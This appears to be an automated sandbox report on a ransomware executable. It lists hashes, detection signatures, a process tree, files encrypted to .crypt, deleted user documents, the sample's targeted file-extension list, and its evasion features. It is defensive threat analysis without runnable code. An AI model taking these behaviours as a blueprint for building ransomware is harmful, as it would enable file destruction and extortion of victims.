Analysis Report bkscEXd86b.bin

Overview

General Information

Sample Name: bkscEXd86b.bin (renamed file extension from bin to exe)
Analysis ID: 367680
MD5: cdda3913408c4c46a6c575421485fa5b
SHA1: 56eec7392297e7301159094d7e461a696fe5b90f
SHA256: e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6
Tags: ransomware

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Creates files in the recycle bin to hide itself
Machine Learning detection for sample
May encrypt documents and pictures (Ransomware)
Modifies existing user documents (likely ransomware behavior)
Potentially malicious time measurement code found
Tries to harvest and steal browser information (history, passwords, etc)
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Installs a Chrome extension
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • bkscEXd86b.exe (PID: 6588 cmdline: 'C:\Users\user\Desktop\bkscEXd86b.exe' MD5: CDDA3913408C4C46A6C575421485FA5B)
    • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • WerFault.exe (PID: 6792 cmdline: C:\Windows\system32\WerFault.exe -pss -s 568 -p 3388 -ip 3388 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • WerFault.exe (PID: 7012 cmdline: C:\Windows\system32\WerFault.exe -u -p 3388 -s 8972 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • explorer.exe (PID: 7120 cmdline: explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • SearchUI.exe (PID: 4888 cmdline: 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca MD5: C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2)
  • OpenWith.exe (PID: 6724 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: D179D03728E95E040A889F760C1FC402)
  • SearchUI.exe (PID: 1748 cmdline: 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca MD5: C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: bkscEXd86b.exe, ReversingLabs: Detection: 42%
Machine Learning detection for sample
Source: bkscEXd86b.exe, Joe Sandbox ML: detected
Source: bkscEXd86b.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: bkscEXd86b.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\john\Documents\Visual Studio 2008\Projects\EncryptFile -svcV2\Release\EncryptFile.exe.pdb source: bkscEXd86b.exe, 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
Source: Binary string: .TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA source: bkscEXd86b.exe, 00000000.00000000.195247550.0000000000CC1000.00000008.00020000.sdmp
Source: Binary string: visioitunesvmwarelynconenoteneroexceloutlook.ts.psd.ai&#xEF87.dwgx86amd64LDICobjdobjTOPPFEHbinLRA.vssx.vstxPTMPVD.iniMMUS:wux:.resxMFOL.config.bakIFF.etlIBA.bin.objFL.pdbLM.dllotstotetftutdtrtpto source: SearchUI.exe, 00000010.00000002.392411511.000001DBD0B40000.00000004.00000001.sdmp
Source: Binary string: dear!!!.TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORAWINDIRTEMP source: bkscEXd86b.exe, 00000000.00000000.195247550.0000000000CC1000.00000008.00020000.sdmp
Source: C:\Users\user\Desktop\bkscEXd86b.exe, Code function: 0_2_00C69E5A __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose
Source: C:\Users\user\Desktop\bkscEXd86b.exe, Code function: 0_2_00B91640 _memset,_memset,_sprintf,FindFirstFileA,_strrchr,_memset,_strncpy,_memset,_sprintf,_memset,_memset,_memset,_memset,_sprintf,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\bkscEXd86b.exe, Code function: 0_2_00B91D10 SetServiceStatus,_calloc,_calloc,_sprintf,_memset,_getenv,GetLogicalDrives,_memset,GetLogicalDriveStringsA,_sprintf,GetDriveTypeA,GetDriveTypeA,GetDriveTypeA,_sprintf,_printf,SetServiceStatus
Source: C:\Users\user\Desktop\bkscEXd86b.exe, Code function: 4x nop then movd mm0, dword ptr [edx] 0_2_00BC8670
Source: bkscEXd86b.exe, 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp, String found in binary or memory: https://www.openssl.org/docs/faq.html
Source: bkscEXd86b.exe, 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp, String found in binary or memory: https://www.openssl.org/docs/faq.html....................crypto
Source: bkscEXd86b.exe, 00000000.00000002.495300837.00000000008AA000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands:

May encrypt documents and pictures (Ransomware)
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\apps_{f2b360b1-22a9-410c-8bc0-d5be522c6486}\0.0.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\apps_{f2b360b1-22a9-410c-8bc0-d5be522c6486}\0.1.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\apps_{f2b360b1-22a9-410c-8bc0-d5be522c6486}\0.2.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appsconversions.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingsconversions.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingsglobals.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingssynonyms.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\0.0.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\0.1.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\0.2.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\0.0.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\0.1.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\localstate\constraintindex\settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\0.2.filtertrie.intermediate.txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_10[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_11[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_12[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_13[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_14[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_15[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_16[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_17[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_18[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_19[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_20[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_21[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_22[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_23[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_24[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_25[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_26[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: c:\documents and settings\user\appdata\local\application data\application data\packages\microsoft.windows.cortana_cw5n1h2txyewy\ac\appcache\n5v1zr9c\1\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_27[1].txt.cryptJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: c:\documents and settings\user\desktop\gaobcviqij\gaobcviqij.docx.crypt
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: c:\documents and settings\user\desktop\gaobcviqij.docx.crypt
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: c:\documents and settings\user\desktop\qcfwyskmha\qcfwyskmha.docx.crypt
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: c:\documents and settings\user\desktop\qcfwyskmha.docx.crypt
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: c:\documents and settings\user\desktop\qncycdfijj\qncycdfijj.docx.crypt
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: c:\documents and settings\user\desktop\qncycdfijj.docx.crypt
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: c:\documents and settings\user\documents\gaobcviqij\gaobcviqij.docx.crypt
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: c:\documents and settings\user\documents\gaobcviqij.docx.crypt
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File deleted: C:\Users\user\Desktop\QNCYCDFIJJ.xlsx
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File deleted: C:\Users\user\Desktop\GAOBCVIQIJ.docx
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File deleted: C:\Users\user\Desktop\PIVFAGEAAV.xlsx
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File deleted: C:\Users\user\Desktop\QNCYCDFIJJ.docx
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File deleted: C:\Users\user\Desktop\PWCCAWLGRE.xlsx
Writes many files with high entropy
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\Network\Downloader\edb.log.CRYPT entropy: 7.99998048858
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log.CRYPT entropy: 7.99983368447
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db.CRYPT entropy: 7.99996975555
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log.CRYPT entropy: 7.99757113066
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00001.log.CRYPT entropy: 7.99654417421
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbtmp.log.CRYPT entropy: 7.99690553802
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db.CRYPT entropy: 7.99853065622
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\Windows\ClipSVC\tokens.dat.bak.CRYPT entropy: 7.99974371926
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.CRYPT entropy: 7.99966984696
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.CRYPT entropy: 7.99997950584
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.CRYPT entropy: 7.99985273162
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini.CRYPT entropy: 7.99180074345
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\Provisioning\Microsoft-Desktop-Provisioning-Sequence.dat.CRYPT entropy: 7.99992495067
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db.CRYPT entropy: 7.99935464182
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000003.db.CRYPT entropy: 7.99983422924
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.CRYPT entropy: 7.99991992498
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-75AA7CADA49CCFA36E050EBC1592844DDD43B44E.bin.CRYPT entropy: 7.99999598784
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-75AA7CADA49CCFA36E050EBC1592844DDD43B44E.bin.CE.CRYPT entropy: 7.99944086327
Source: C:\Users\user\Desktop\bkscEXd86b.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\bkscEXd86b.exe | Code function: 0_2_00B91C80 OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,SetServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00B91C80
Source: C:\Users\user\Desktop\bkscEXd86b.exe | Code function: String function: 00BA3490 appears 95 times
Source: C:\Users\user\Desktop\bkscEXd86b.exe | Code function: String function: 00C6BB10 appears 108 times
Source: unknown | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 568 -p 3388 -ip 3388
Source: bkscEXd86b.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: classification engine | Classification label: mal76.rans.spyw.evad.winEXE@9/201@0/1
Source: C:\Users\user\Desktop\bkscEXd86b.exe | Code function: 0_2_00B92130 StartServiceCtrlDispatcherA,0_2_00B92130
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_01
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3388
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\AdobeARM.log.CRYPT
Source: unknown | Process created: C:\Windows\explorer.exe
Source: bkscEXd86b.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File read: C:\$Recycle.Bin\S-1-5-18\desktop.ini
Source: C:\Users\user\Desktop\bkscEXd86b.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: bkscEXd86b.exe | ReversingLabs: Detection: 42%
Source: unknown | Process created: C:\Users\user\Desktop\bkscEXd86b.exe 'C:\Users\user\Desktop\bkscEXd86b.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 568 -p 3388 -ip 3388
Source: unknown | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3388 -s 8972
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown | Process created: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
Source: unknown | Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown | Process created: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
Source: C:\Windows\System32\WerFault.exe | Process created: unknown unknown
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32
Source: C:\Users\user\Desktop\bkscEXd86b.exe | File written: C:\$Recycle.Bin\S-1-5-18\desktop.ini
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe | File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: bkscEXd86b.exe | Static file information: File size 1322496 > 1048576
Source: bkscEXd86b.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: bkscEXd86b.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: bkscEXd86b.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: bkscEXd86b.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: bkscEXd86b.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: bkscEXd86b.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: bkscEXd86b.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\john\Documents\Visual Studio 2008\Projects\EncryptFile -svcV2\Release\EncryptFile.exe.pdb source: bkscEXd86b.exe, 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
Source: Binary string: .TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA source: bkscEXd86b.exe, 00000000.00000000.195247550.0000000000CC1000.00000008.00020000.sdmp
Source: Binary string: visioitunesvmwarelynconenoteneroexceloutlook.ts.psd.ai&#xEF87.dwgx86amd64LDICobjdobjTOPPFEHbinLRA.vssx.vstxPTMPVD.iniMMUS:wux:.resxMFOL.config.bakIFF.etlIBA.bin.objFL.pdbLM.dllotstotetftutdtrtpto source: SearchUI.exe, 00000010.00000002.392411511.000001DBD0B40000.00000004.00000001.sdmp
Source: Binary string: dear!!!.TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORAWINDIRTEMP source: bkscEXd86b.exe, 00000000.00000000.195247550.0000000000CC1000.00000008.00020000.sdmp
Source: bkscEXd86b.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: bkscEXd86b.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: bkscEXd86b.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: bkscEXd86b.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: bkscEXd86b.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\bkscEXd86b.exe | Code function: 0_2_00C79CB0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00C79CB0
